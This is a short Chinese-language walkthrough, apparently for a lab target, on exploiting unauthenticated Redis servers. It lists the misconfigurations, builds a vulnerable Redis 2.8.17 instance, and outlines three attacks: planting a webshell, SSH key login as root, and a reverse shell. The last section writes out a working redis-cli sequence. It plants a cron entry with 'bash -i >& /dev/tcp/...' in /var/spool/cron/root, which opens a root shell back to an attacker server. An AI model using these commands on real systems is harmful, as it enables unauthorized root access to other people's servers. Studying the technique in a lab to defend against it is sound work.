1. 漏洞的原因

开启远程连接，允许其他ip访问；

关闭保护模式；

没有设置密码。

2.环境的配置

1. wget http://download.redis.io/releases/redis-2.8.17.tar.gz

2. tar xzf redis-2.8.17.tar.gz

3. cd redis-2.8.17

4. make

5. 当前目录:redis-2.8.17,首先vi redis.conf，

6.运行

这是靶机的配置

在攻击方机器，安装并运行redis，推荐直接apt安装，最新版本即可。

3.连接

攻击方：

4. webshell

这种情况可以用在权限较低的情况下

攻击方连接成功后

在web目录下出现shell，菜刀连接

5.ssh免密码登陆

最后 ssh -i id_rsa root@ip(靶机ip)

6.交互式shell

1.在自己的服务器上监听一个端口，一会反弹到这里来#

2.攻击方 redis-cli -h ip

set x "\n* * * * * bash -i >& /dev/tcp/ip(vps)/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save